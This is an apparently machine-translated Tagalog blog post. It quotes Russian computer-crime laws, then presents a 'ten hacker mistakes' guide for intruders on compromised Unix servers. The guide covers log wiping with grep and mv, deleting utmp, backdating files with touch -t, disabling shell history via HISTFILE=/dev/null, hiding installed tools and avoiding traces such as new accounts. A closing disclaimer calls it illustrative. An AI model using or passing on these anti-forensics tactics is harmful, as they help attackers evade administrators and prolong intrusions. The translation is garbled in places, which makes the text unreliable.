    Hello Nadezhda! Nag-unsubscribe ka sa aking blog na nagsasabi na nasa iyo ang lahat ng data sa isang cyber criminal, ngunit hindi mo alam kung paano ito gamitin upang parusahan ang umaatake. Interesado din ako sa tanong na ito, kaya ibinabahagi ko ang impormasyon na nagawa kong "mangisda" sa bagay na ito mula sa lawak ng kasalukuyang Internet, na nilapastangan ng maraming masasamang tao sa anyo ng mga hacker at scammer:

    — Magreklamo sa provider ng hacker na nagsasagawa ng pag-atake sa iyong site. Naunang nakolekta ang lahat ng magagamit na ebidensya (mga screenshot, log, data, sulat, atbp.). Mukhang ang desisyon ng provider na harangan ang Internet para sa isang umaatake ay ginawa sa pamamagitan ng korte. Hindi ko alam eksakto.

    — Makipag-ugnayan sa mga ahensyang nagpapatupad ng batas, partikular sa FSB. Ang Criminal Code ng Russian Federation ay may mga sumusunod na artikulo:

    Kodigo sa Kriminal ng Russian Federation Kabanata 28: Krimen sa larangan ng impormasyon sa computer
    Artikulo 272. Ilegal na pag-access sa impormasyon sa computer
    1. Labag sa batas na pag-access sa impormasyon ng computer na protektado ng batas, iyon ay, impormasyon sa computer media, sa isang elektronikong computer (computer), computer system o kanilang network, kung ang pagkilos na ito ay nagsasangkot ng pagkasira, pagharang, pagbabago o pagkopya ng impormasyon, pagkagambala ng ang pagpapatakbo ng computer, system Computers o kanilang mga network - ay may parusang multa sa halagang dalawang daan hanggang limang daang beses ang pinakamababang buwanang sahod, o sa halaga ng sahod o iba pang kita ng nahatulang tao sa loob ng dalawang panahon hanggang limang buwan, o sa pamamagitan ng correctional labor sa loob ng anim na buwan hanggang isang taon, o sa pamamagitan ng pagkakakulong ng hanggang dalawang taon.

    2. Ang parehong gawa, na ginawa ng isang grupo ng mga tao sa pamamagitan ng naunang pagsasabwatan o ng isang organisadong grupo o ng isang taong gumagamit ng kanyang opisyal na posisyon, pati na rin ang pagkakaroon ng access sa isang computer, isang computer system o kanilang network, ay may parusang multa sa halagang limandaan hanggang walong daang beses ang pinakamababang sahod o sa halaga ng sahod o iba pang kita ng nahatulang tao sa loob ng lima hanggang walong buwan, o correctional labor para sa isang termino ng isa hanggang dalawang taon, o pag-aresto para sa isang termino ng tatlo hanggang anim na buwan, o pagkakulong ng hanggang limang taon.

    Artikulo 273. Paglikha, paggamit at pamamahagi ng mga nakakahamak na programa sa computer
    1. Paglikha ng mga programa sa computer o paggawa ng mga pagbabago sa mga umiiral nang programa, na sadyang humahantong sa hindi awtorisadong pagsira, pagharang, pagbabago o pagkopya ng impormasyon, pagkagambala sa pagpapatakbo ng isang computer, computer system o kanilang network, pati na rin ang paggamit o pamamahagi ng mga naturang programa o computer media na may ganitong mga programa - ay dapat parusahan ng pagkakulong ng hanggang tatlong taon na may multa sa halagang dalawang daan hanggang limang daang beses ang pinakamababang buwanang sahod, o sa halaga ng sahod o iba pang kita ng nahatulan sa loob ng dalawa hanggang limang buwan.
    2. Ang parehong mga gawa, na nagsasangkot ng malubhang kahihinatnan sa pamamagitan ng kapabayaan, -
    ay dapat parusahan ng pagkakulong sa loob ng tatlong hanggang pitong taon.

    Artikulo 274. Paglabag sa mga patakaran para sa pagpapatakbo ng mga computer, computer system o kanilang mga network
    1. Paglabag sa mga patakaran para sa pagpapatakbo ng isang computer, isang computer system o kanilang network ng isang tao na may access sa isang computer, isang computer system o kanilang network, na nagreresulta sa pagkasira, pagharang o pagbabago ng impormasyon ng computer na protektado ng batas, kung ang gawaing ito ay nagdulot ng malaking pinsala, -
    ay dapat parusahan sa pamamagitan ng pag-alis ng karapatang humawak ng ilang mga posisyon o makisali sa ilang mga aktibidad sa loob ng isang termino hanggang limang taon, o sa pamamagitan ng sapilitang trabaho para sa isang taning na isang daan at walumpu hanggang dalawang daan at apatnapung oras, o sa pamamagitan ng paghihigpit ng kalayaan para sa isang termino ng hanggang dalawang taon.
    2. Ang parehong gawa, na nagdulot ng malubhang kahihinatnan dahil sa kapabayaan, -
    ay maaaring parusahan ng pagkakulong ng hanggang apat na taon.

    Ang parehong paraan ng "paghihiganti" ay nagsasangkot ng hindi kapani-paniwalang red tape, mga korte, atbp.

    Isang batang hacker, na may napakaraming na-hack na machine sa kanyang account, ang hindi matagumpay na sinubukang i-access ang server ng isang internasyonal na bangko. Sa wakas ay nabasag niya ang sistemang ito, gumugol ng ilang gabing walang tulog dito. "Nakita ba talaga nila ito? Nilinis ko ang mga troso at labis na nag-iingat," naisip niya. Biglang naputol ang kanyang pag-iisip ng manipis na langitngit ng UPS, na nangangahulugan ng pagkawala ng kuryente. Pagkatapos ay may malakas na katok sa pinto, kung saan nakatayo ang mga armadong empleyado ng federal. Malungkot na natapos ang kwentong ito kung hindi... nagising sa langitngit ng kanyang alarm clock ang kawawang hacker.

    Sa katunayan, kakaunti ang mga hacker ang magha-hack sistema ng pagbabangko nang hindi alam ang mga pangunahing kaalaman sa iyong sariling kaligtasan. Ang mga tagapangasiwa sa mga sistemang madiskarteng mahalaga ay hindi mga hangal na tao at tumatanggap ng magandang pera para sa kanilang trabaho, kaya lubhang mapanganib na makipagkumpitensya sa kanila sa kaalaman sa teknolohiya ng computer.

    Ngunit sinira nila ito! Nasira sila at nananatiling hindi napapansin sa mga server sa loob ng ilang buwan, o kahit na taon. At lahat salamat sa basic camouflage. Ito ay nakakamit, bilang panuntunan, sa pamamagitan ng pagsunod sa ilang hindi nakasulat na batas na alam ng bawat self-respecting hacker. Sa pamamagitan ng paglabag sa isa sa mga panuntunang ito, maaari kang maging bulnerable sa mga admin, na agad na matutukoy at mane-neutralize ang natagpuang nanghihimasok. Sa kasong ito, ang mga kahihinatnan para sa lumabag ay maaaring maging lubhang kakila-kilabot.

    Nagtataka ba kayo kung anong uri ng mga paglabag ang pinag-uusapan natin? Sa artikulong ito, ilalarawan ko sa madaling sabi ang sampung pagkakamali ng hacker na, sa aking palagay, ang pinakasikat. Ang mga error ay pangunahing nauugnay sa mga unix-like system, kaya hinihiling ko sa mga tagahanga ng Windows na huwag umasa.

    1. Paglilinis ng mga tala

    Kakatwa, kakaunti ang gustong maglinis ng mga log sa isang na-hack na system. Ngunit ito ay sa pamamagitan ng mga log na nakita ng administrator ang panghihimasok. Tingnan natin ang mekanismo para sa paglikha ng mga log sa isang unix-like na operating system.

    Bilang panuntunan, ang impormasyon ng serbisyo ay itinatapon sa isang file gamit ang syslog() function. Direktang gumagana ang function na ito sa syslogd daemon, o sa kahalili nito (syslog-ng, halimbawa). Ang daemon na ito ay may sariling configuration file (/etc/syslog.conf bilang default), na nagdedetalye ng lokasyon ng mga log file at ang pamantayan para sa isang partikular na log upang maayos na maihiwalay ang mga langaw sa mga cutlet. Madalas nakakalimutan ng isang hacker na maaaring baguhin ng admin ang mga pangalan ng mga default na log sa pamamagitan ng pag-redirect sa /var/log/secure sa, halimbawa, /usr/admin/secure. Bilang karagdagan, ang mga log ay maaaring isulat sa console ng isang partikular na user, na lubos na nagpapalubha sa sitwasyon ng isang hacker.

    Ang paglilinis ng mga naturang file ay dapat isagawa nang may matinding pag-iingat: sa mga pinagkakatiwalaang logwiper, o sa pamamagitan ng kamay (perpekto). Personal kong nakatagpo ang mga naturang logwiper, pagkatapos gamitin kung aling data logging ang tumigil. Sa tingin ko, ang isang kagalang-galang na admin sa sitwasyong ito ay mabilis na makakapansin ng mga problema sa system.

    Kakatwa, napakadaling i-clear ang mga text log sa pamamagitan ng kamay. Una, kailangan mong malaman kung mayroong data sa mga log na dapat alisin (halimbawa, ang ip ng hacker o pag-login sa system). Ang impormasyong ito ay maingat na iki-clear mula sa isang hiwalay na log at pagkatapos ay i-redirect sa isang pansamantalang file. At pagkatapos lamang na ang pansamantalang file ay pinalitan ng pangalan sa tunay. Ginagawa ang mga operasyong ito gamit ang karaniwang grep at mv command. Maaari din silang isagawa gamit ang mga panlabas na editor (vi, ee, mc).
    Kung ang paglilinis ng mga text log ay hindi nagiging sanhi ng anumang partikular na almoranas, kung gayon ang pagproseso ng mga binary file ay medyo mas mahirap. Dito hindi mo magagawa nang walang mga espesyal na logwiper na nauunawaan ang istraktura ng mga sumusunod na file: /var/log/wtmp, /var/log/lastlog at /var/run/utmp.

    Madalas na lutasin ng mga hacker ang problema sa isang simpleng rm command. Ngunit kung nakita ng administrator na walang mga gumagamit sa kanyang system sa nakaraang buwan, hindi magiging mabuti ang pakiramdam ng umaatake. Maaari mo lamang tanggalin ang utmp file na nagpapakita ng mga user sa system sa sa ngayon oras. Pagkatapos ng pagtanggal, dapat sundin ang touch command, na muling likhain ang file. Kung hindi ito nagawa, ang /usr/bin/w binary ay magrereklamo tungkol sa kakulangan ng utmp, at ang mga online na user ay hindi maitatala.

    2. Pagbabago ng petsa sa mga file

    Ang petsa sa mga file ay mahinang lugar ng isang hacker. Ito ay sa petsa na tinutukoy ng mga program sa pagsubaybay ng system ang pag-install ng rootkit o mga pagbabago sa mga file ng system. Maaari mong baguhin ang petsa sa isang file gamit ang touch command gamit ang -t parameter, na sinusundan ng petsa sa format na: MonthDayHourMinuteYear. Ang mga cracker ay madalas na nakakalimutang palitan ang petsa pabalik sa luma pagkatapos i-edit ang conf o muling isulat ang binary. Mabilis na nakita ng mga administratibong utility ang mga pagbabago sa system at nagpapadala ng detalyadong ulat sa administrator.

    3. Kasaysayan ng pangkat

    Ang isang kailangang-kailangan na katangian ng anumang shell ay ang pag-iimbak ng kasaysayan ng mga utos na nai-type ng gumagamit. Ginagawa ito upang maulit ang isang naunang nai-type na utos. Ang file na may kasaysayan ng mga utos ay pangunahing pinag-aralan ng isang hacker sa matagumpay na pag-hack ng system, upang makakuha ng paunang impormasyon tungkol sa mga aktibidad ng administrator, o upang kunin ang mga password mula sa mga console program.

    Ngunit kung titingnan mo mula sa kabilang panig, kung gayon ang admin ay maaaring maging paranoid, na regular na nag-aaral ng kanyang sariling file ng kasaysayan. At kung ang isang hacker ay nakagawa ng isang patas na dami ng paghuhukay sa system, kaya nag-iiwan ng kasaysayan ng pag-install ng mga rootkit o DoSers, ang reaksyon ng administrator ay hindi mahuhulaan Samakatuwid, ang bawat hacker ay dapat na takpan ang kanyang mga track sa isang napapanahong paraan.

    Ang lokasyon ng history file ay matatagpuan sa pamamagitan ng HISTFILE environment variable sa pamamagitan ng pagtingin dito gamit ang console command echo $HISTFILE. Alinsunod dito, pagkatapos ng command na i-export ang HISTFILE=/dev/null, ang pagsusulat ng mga command sa file ay titigil. Pansin! Gumagana lang ang diskarteng ito sa tagal ng kasalukuyang session, kaya kailangang isagawa ng hacker ang utos tuwing lalabas siya sa system.

    4. Infecting ang system gamit ang rootkits

    Kabalintunaan kahit na tila, ang pag-install ng mga rootkit ay madaling maglantad ng isang hacker. Una, kapag pinapalitan ang mga file ng system, siya, bilang panuntunan, ay nagkakamali sa No. 2, dahil ang pagtatakda ng orihinal na petsa sa isang grupo ng mga binary ay, upang ilagay ito nang mahinahon, mahaba at hindi sporty. Pangalawa, kung itinakda ng admin bagong bersyon package (binutils, halimbawa), pagkatapos ay ang pag-install ng luma sa ibabaw ng system ay hindi hahantong sa anumang mabuti. Bukod dito, ang umaatake ay maaaring magbigay ng mga command key na tinukoy ng alias Halimbawa, ang lumang bersyon ng /bin/ls ay hindi nauunawaan ang --colors key, at maraming rootkit ang naglalaman ng eksaktong mga lumang bersyon rootkit sa isang bagong sistema, awtomatikong pinipirmahan ng hacker ang kanyang sariling death warrant.

    5. Pag-install ng iyong software

    Ang pagkakaroon ng pag-hack ng isang system, madalas na ini-install ng attacker ang kanyang sariling software dito, halimbawa, mga medyas o nmap, na medyo lohikal - kailangan niya ng isang sistema ng pagsubok, at nakuha niya ito. Ngunit kahit na ang mga proseso ng umaatake ay nakatago, kung gayon sa kasong ito ang administrator ay maaaring makakita ng isang bukas na port 1080 sa system. Pagkatapos ay mabilis niyang mahulaan kung ano ang nangyayari, at sa gayon ay ihayag ang disguise ng hacker.

    Sa katunayan, pagkatapos ng pag-hack, sinusuri ng attacker ang mga aktibidad ng admin at gumawa ng mga konklusyon tungkol sa antas ng kapabayaan ng server. Ngunit hindi mo pa rin dapat i-install ang iyong mga programa sa mga direktoryo ng ugat. Upang maiwasan ito, ang hacker ay dapat lumikha ng kanyang sariling hiwalay na nakatagong direktoryo at i-install ang lahat ng software ng labanan dito. Ito ay nakakamit gamit ang command ./configure --prefix=/path/to/hidden/xakep_dir kapag nag-i-install ng mga package.

    6. Pag-scan mula sa isang na-hack na sistema

    Ang pinakakaraniwang pagkakamali sa lahat ng nakalista. Pagkatapos ng lahat, ang isang pag-scan mula sa isang sirang server ay hindi kailanman humahantong sa anumang mabuti. Tingnan para sa iyong sarili: ini-scan ng umaatake ang subnet gamit ang nmap o isa pang magagamit na scanner pagkatapos nito ay maaaring magsulat ng reklamo ang masunurin sa batas ng na-scan na network sa pag-abuso sa kumpanya kung saan ginawa ang pag-scan, na ipinapadala ang lahat ng mga log na nagpapatunay sa katotohanan. ng pagpasok .

    Siyempre, ang sitwasyong ito ay malayo sa karaniwan. Dahil sa pagkawalang-galaw ng ating magigiting na mga administrator, kadalasang nakakawala ang mga hacker sa pag-scan. Ngunit tandaan na maaari niyang ilagay ang kanyang sarili sa karagdagang problema sa pamamagitan ng pagsasagawa ng mga aktibong aktibidad mula sa isang na-hack na server.

    7. Pagbabago ng mga panuntunan sa firewall

    Ang firewall ay isang personal na bagay para sa administrator. At kung inilagay niya ito, ipinapalagay na alam niya ang lahat ng mga patakaran nito tulad ng likod ng kanyang kamay. Kung ipasadya ng hacker ang mga ito ayon sa kanyang panlasa, sa lalong madaling panahon ay ihihinto ng administrator ang mga pagkilos na ito. Ang pagbubukod ay maaaring kahila-hilakbot na mga tambak ng mga panuntunan, malinaw na hindi pinagsama-sama ng administrator ng system. Ang pagdaragdag ng hindi kapansin-pansing entry sa paputok na timpla na ito ay hindi magdudulot ng sakuna.

    Kung ang firewall ay naglalaman ng ilang mga panuntunan na nababasa ng tao, at, sa paghusga ng HISTFILE, ang administrator ay regular na sinusubaybayan ang mga ito, pagkatapos ay wala nang magagawa kundi sundin ang mga ito, o baguhin ang mga pinagmumulan ng firewall (para sa mga C guru). Sa pamamagitan ng paraan, ito ang pinakaastig na opsyon.

    8. Pagdaragdag ng mga bagong user

    Isang medyo tipikal na sitwasyon: pagkatapos ng pag-hack ng isang system, ibinahagi ng isang hacker ang kanyang mga impression sa hack sa IRC o ICQ. Ang kanyang matalik na kaibigan agad silang nagsimulang humingi ng mga shell para sa personal na pangangailangan. Pagkatapos mag-isip ng kaunti, idinagdag ng hacker ang gumagamit sa system, tinitiyak ang kanyang sarili na ang shell ay hindi ugat, paano ito makagambala sa akin. Kinabukasan, nakatanggap ang administrator ng isang ulat sa umaga tungkol sa mga maanomalyang insidente sa system at nakahanap ng isang kawili-wiling linya dito, halimbawa:

    Mga bagong user:
    xakep:x:31337:31337:Xakep user:/home/xakep:/bin/bash

    Ngayon ay maaari kang magpaalam sa isang root account sa isang na-hack na kotse.

    Upang maiwasang mangyari ito, dapat na walang mga bagong user sa system mula sa hacker. Pinakamainam na subukan ang lakas ng umiiral na mga account at gamitin ang mga ito.

    9. Pagpasok ng mga hindi awtorisadong tao sa sistema

    Ang error na ito ay katulad ng nauna, ngunit may isang pagkakaiba. Kadalasan, hinihiling sa isang hacker na i-access ang isang server sa pamamagitan ng kanyang sariling backdoors. Matapos bigyan ang naturang pag-access, maaari kang agad na magpaalam sa server. Iba-iba ang lahat ng tao, at madaling masira ng isang tagalabas ang lahat ng mga panuntunang inilarawan sa itaas sa isang session, at sa gayon ay masira ang iyong pagbabalatkayo sa system.

    Ang isang karampatang hacker ay hindi kailanman lumilikha ng mga ganitong sitwasyon. Bukod dito, hindi siya nagsasalita tungkol sa pag-hack kahit saan, palaging inuuna ang kanyang sariling kaligtasan. Paglabag ng panuntunang ito Ito ay posible lamang kung ikaw ay kumbinsido na sa sandaling ang pag-access ay naibigay sa iyo ay hindi magkakaroon ng anumang hindi kinakailangang mga problema.

    10. Pagpili ng propesyon ng hacker

    Oo, tama ang narinig mo! Ang isang hacker ay tulad ng isang sapper; ang unang pagkakataon na siya ay nagkamali sa pagpili ng kanyang propesyon. Ang bawat hack ay maaaring nakamamatay para sa kanya, at siya mismo ay nakakaalam nito. Ngunit hindi niya ito matanggap, isinasaalang-alang ang pag-hack ng isang matinding isport. Kung iniisip mo pa rin kung magiging hacker o hindi, bibigyan kita ng ilang payo. HINDI! Ang pagiging hacker ay hindi na uso, at bukod dito, ito ay mapanganib. Kaya't mas mahusay na gumawa ng iba pa, halimbawa, pagbebenta ng mga pangwakas na sanaysay sa paaralan sa wikang Ruso sa pamamagitan ng Internet :).

    Ang mga ito, sa katunayan, ay ang lahat ng mga pagkakamali na humahantong sa malungkot na kahihinatnan. Ngunit, inuulit ko muli, ang lahat ng mga pagkakamaling ito ay may kaugnayan lamang sa isang sistemang pinamunuan kung saan nakaupo ang isang matapat na tagapangasiwa na karapat-dapat na tumanggap ng kanyang suweldo. Sa pagpapatakbo ng mga server, kung saan sinusubaybayan ng administrator ang system kapag lasing at tuwing holiday lang, magagawa mo ang anumang gusto mo - hindi na ito lalala.

    Ang materyal na ito ay inilaan upang ipakita ang mga tipikal na kaso kapag ang mga hacker ay nagpapanggap bilang isang na-hack na system. Hindi ito dapat ituring na gabay sa pagkilos. Bago ka gumawa ng isang bagay na hindi na mababawi, basahin muli ang punto 10. Marami pa ring kawili-wiling bagay sa mundo :).

    Mga utility sa pagsubaybay o tulong ng admin

    Binanggit ng artikulong ito ang mga utility ng admin nang higit sa isang beses. Ang mga ito ay mga program na nag-i-scan sa system araw-araw (md5 kabuuan ng mga binary, mga pagbabago sa mga conf, proseso, atbp.) at naghahambing ng mga pagbabago sa kanilang database. Pagkatapos nito ay bumubuo sila ng isang ulat at ipinadala ito sa admin. Ang programa mismo ay nakabitin sa anyo ng isang daemon o inilunsad ng crontab Ang isang halimbawa ng naturang utility ay ang tripwire program.